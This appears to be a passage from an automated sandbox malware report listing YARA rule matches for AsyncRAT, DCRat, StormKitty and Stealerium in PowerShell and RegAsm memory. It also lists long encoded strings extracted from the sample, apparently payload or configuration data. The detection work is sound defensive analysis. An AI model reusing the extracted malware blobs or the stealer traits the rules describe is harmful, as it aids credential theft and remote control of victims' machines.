            Source: 4.2.powershell.exe.277bd7f4722.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
            Source: 4.2.powershell.exe.277bd6d0998.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 00000008.00000002.4120817567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 00000004.00000002.1859609945.00000277BD3AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
            Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: 00000004.00000002.1859609945.00000277BD6D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: powershell.exe PID: 7528, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: Process Memory Space: powershell.exe PID: 7772, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
            Source: Process Memory Space: RegAsm.exe PID: 7976, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.powershell.exe.277c5710000.12.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.powershell.exe.277aefa2e20.7.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.powershell.exe.277aefb4be0.2.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.powershell.exe.277ad5d9448.4.raw.unpack, Ntilg.csCryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.powershell.exe.277af06a9f0.1.raw.unpack, ClasserPlus.csBase64 encoded string: 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'
            Source: 4.2.powershell.exe.277c5710000.12.raw.unpack, Knvbl.csBase64 encoded string: 'WC4GpJ6uLUYutfBk1g5z6L5p71FN3laLUfOFbOXy8QpvqoKStI/r0b5559mkOe1W0sE4+IpoBS0MvKu1egSOZbMch1WruvilZ0J+2G0YROJgLeSWOjgiEPmbe8MrZkewEYtD3lsGpG0rZhXWXWyRlu8mG5KMip7K7S8JQTIEhdHLPaWcqBg8PHQKNwOcLVUv2k5j4Ku8hkWuPRtH1xgQTMEn/YS520LKi9lkvuP3DgoW/KHiv87WKblJrzm4b4ydOaw1C+SGJNgjfVCVguKO/8Ts+Y07tWBC44inZF3g/sl6+jBDk1qi4k9WW01mu2pVAKz7YOc3hEz/rmbcCwudcA1MmzxQkFig4rK0b9zFWQ5Zcb4xfUTtBnMHdOX2GHq2+LL0Z7a61r2QMGW6Y2Ej+PoRRRL466JqgtqbiNdDKAyxvLyvc3RpR1vmeHgNKKHQKzhXW1eD7z8AXZS2eU0owPaedtLN/yE6eJ+wx5+rG+5jf3JXdcgn064dLcCoIyYP3U+0bJMoi+yltO4ezVzM69iQ/zNKLrL+04ySiBKzEr49K44dDOcjlxwAEzxdV6FKEGGjskXJc11fSFpQFSxzMDAH5tAbKL9LASG1L7xSscftryjRwmNMIQ21Qk7dmGz704MU0AUUZkTRLuOV2NSgpl2rX0UY9QVE9CoZvyEuQh7WZNhiN9dHSBZtgdkYeG5NrxIN8+1tNCvnUG8tsIp0b2558g3NXvb/ka5gyTDx+HgKUf8gpUS12m2XiG3H53hibzWXAGgxTzHpj92uf5VS7M2fn4nr2awwBfcXZVvJz2eEURJO0pPObI8FZt0+99ImCmgXpRqdCvwQaPNXsyeVtI9GI+gN3tUIjIsPjT0yGGNPkSuux5i5/NXYWgXS4u3meDaq9qT2/3QLby+npC9YZeMnMd+JD93RzHVFk9uUd4+CcnDks44wPpuKtpK780kul0SAaGe7XV3EZQ1fm1gcKPR3FAS6bajlVSXhXdp+kbHFrF7zzDcOcBzapnIPyTCOAmOdW4KyOfQ9cQTh2QnpMrKbTp9OsPbSkjgcih2/5dEdA42I/HscpQ+oyp9wDwKLQI4LOVLCPUI7BSJSPLnTvTPeoXG2OXqfcZfVUx7MJlhJar2yKuqdzOzCX7a35rf0bFePaP5ISfxn2snJPbK7OB93G3vfjiBUOYWsAs02zAgjQt/LHTEDClScrTyADWo+WEXvNICbtWm/h242wpLytiF/KtWYm3ERwaE5cK2F9TeiB1VNB79lUQduJq2TK5bErB0LO8X8XdM+Gu0Hk8nEkjLSZc+tr0txAGWVncIbLgTtOwdTL0ENFlXJFfeVViAnkl/8ixoEKEzDBIrb+2yaWVZ0636UuJFnbws1NX/1LM0PpO+lLPQZvlkx1XVug7zm8MMIyn2VLVOvtqgila1Es5nczvlxo1hplLalhLP7PNXvzqJV73kbh+IeJ8hXQ0ntzzMENOINdttjodC2++Dv3r9GZilwY0gC1uM05zdUgoLmZE/D3I9R5+gmLEYxCEhAvxrANmXDAW/mQ81f0iSAqE/N2O86kKiba9OufsCYhwlQ5GfTEmaMOcBO/7ADvOiNj0gXnhBhC3GbNsPifKZqLmdBE6zDrFgwIF2XHYsbfWvWGdVmtAqbj5lyWwoxf8zbNKEPKFbx72mh1B5wGd5B/liiHgxJ8lVv+KGs8ziwUW98N9krMFBxxrrQySDFbPrikVE4DCcG1mkEhRi080696ooeYMbL+b1m07jfvtGvBM0C0Rq31o3G/QVWw12P41f9EEqkFCz9/FSqVbrfvQsdXdBfAmpRljdbfHZUvjc7clN9he+gUYaXAC3yDDvWa8k5YCe1mh0StwU0Jl0/FA/DmquFqNTl0x6NTeVHLcp52vTIGc4BMShukpjC1kT2kzgQxyxybHNy1nfDqp1brx/svHgIK6vvyUEXyTEHFAFX2SaCobwWhK5oT4Ush+fzMiiVHh8Wb+HSYfYGum9RfBk96uz5L26O3v9bRALiX8ouk+R7C4MCOUoLTWWIs+9l7rs0/BoBoVIxkWnKqzDv7qG4jcRCIhVYG/4JLpUkZL7sl6Ltdb9RFrbmAFIRG95EYudOqjJxMbpTr4BCeshCgsPYHfjDOiK/LUX9CBDaUCQA0iAJN7BgiNRe83q6BnM6JAMcZVpJ1OqjH+aV6w0J5Ni3rqLZNsDyJO3E7JjnlqYdNok294My1aocc5Y0GBGEpdfNDWmLJe4r88zW+po6tIu7hdGUPkALmvwl2VqNqxj4s0+BPHNfUGV7QdwTJ9MfiQ4pTm/9c+xmycu09yY+rwbQCA2m/vcG/+1EYA6QQe2aKD6p6YdWfRSAAVn2KbwPlbVO0coEAre/QF5fVW8DrmK3yF8trtc6xJUlYoGxHaxqlKeyCU7GRpoALpxtNUETkBw5brsGXQlZtJoFz4VoH8f8l29IJxzP0TkremFbc1JQ8c5pX8oLxOTrXdlNDvsc4JvdsFr9s7DcpWS/HQvU8na9hNr6kIR7oUqIyfxIBOZF1f488FRG3ra2zAPmjIo7V1ntYBaIVsEZUZkrNU0jPPYSTSG4TWKt9BOjB4to7sIT+5SttIXYprI2dcYTeaiWa331lEKKv9kwWNPz/5ZKbKG53ZnS/bwB3xobRS3H7e2P3nZo93PwwH+/0YiJlJD0EulS4ewiytZQcvKtlaXsMoH0AMwAQYEnVZ0CgMJxp9JrkvsMK+HGnP5xb4HcnTfIKpJ3JnUmwyEcVgFzodnVz4P1d4jVwjGp6ZcBVdFMf8Gc4vDlmX7CdnVl+Mojdb3jaSJ412rMYGGc7bFdYIhe2PDUklhTXHyU4Y8fgHAzViUPnYGN5lWOec0gqf27qQGVZgcnMUVFi/040anqgw1N33w83v8KwPWjvM4wFVFexNVSU90C4Zi0oxyp8cvdhoGXC1byVWTqxH/s066RUM5H2VKw3pCqwA8G0WW3/7/+IfiTsIjFzKMyBCmUKqD
            Source: 4.2.powershell.exe.277aefa2e20.7.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 4.2.powershell.exe.277aefb4be0.2.raw.unpack, Knvbl.csBase64 encoded string: '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
            Source: 4.2.powershell.exe.277ad5d9448.4.raw.unpack, Knvbl.csBase64 encoded string: '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